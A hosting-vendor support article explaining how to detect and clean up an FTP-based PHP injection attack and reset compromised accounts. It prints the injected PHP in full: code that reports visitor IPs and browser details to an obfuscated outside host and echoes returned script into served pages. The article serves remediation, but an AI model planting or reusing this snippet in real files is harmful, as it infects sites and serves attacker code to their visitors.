KB: 21012014-001: Fixing webhosting php-hash-update attack
Symptom
Core-Admin has reported unallowed changes at your hosting files and taking a look on them you find that they were updated with something similar to:
<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>
Affected releases
All
Background
This attack is done through the FTP server, downloading the original file and then updating it with the additional content. In essence, the attack looks for updating your files adding additional content without updating the rest.
This attack is possible because the password was stolen from a compromised equipment that has some virus or malware that looks for stored password at known locations or because an FTP session was opened using this password over an unsecure connection (like public wifis).
Solution
You have to find which files were updated to remove the “additional content added”. Also, you must reset password for all FTP accounts that were used to run this attack. Fortunetaly Core-Admin already includes an application that automates these tasks.
Follow next instructions to cleanup and reset all required FTP accounts:
- Run the following command as root in a server’s shell:
>> crad-find-and-fix-phphash-attack.pyc
- Once finished, it will report which files were updated and which FTP account were compromised. Now, run the tool again asking to fix this:
>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts